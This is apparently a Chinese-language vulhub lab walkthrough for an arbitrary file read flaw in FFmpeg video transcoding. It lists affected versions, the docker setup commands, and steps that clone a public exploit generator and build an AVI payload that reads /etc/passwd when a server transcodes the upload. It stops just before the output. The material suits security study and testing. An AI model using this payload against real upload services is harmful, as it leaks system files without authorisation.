1、简介
FFmpeg是一套目前非常流行的可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算机程序。它提供了录制、转换以及流化音视频的完整解决方案
2、影响版本
FFmpeg 2.6.8
FFmpeg 3.2.2
FFmpeg 3.2.5
3、环境搭建
使用vulhub和docker快速搭建
cd vulhub/ffmpeg/phdays
docker-compose up -d
打开http://your-ip:8080/即可看到上传点
直接下载exp,并生成payload:
# 下载exp
git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
cd ffmpeg-avi-m3u-xbin
# 生成payload
./gen_xbin_avi.py file:///etc/passwd exp.avi
生成exp.avi,在http://your-ip:8080/上传。后端将会将你上传的视频用ffmpeg转码后显示,转码时因为ffmpeg的任意文件读取漏洞,可将文件信息读取到视频中: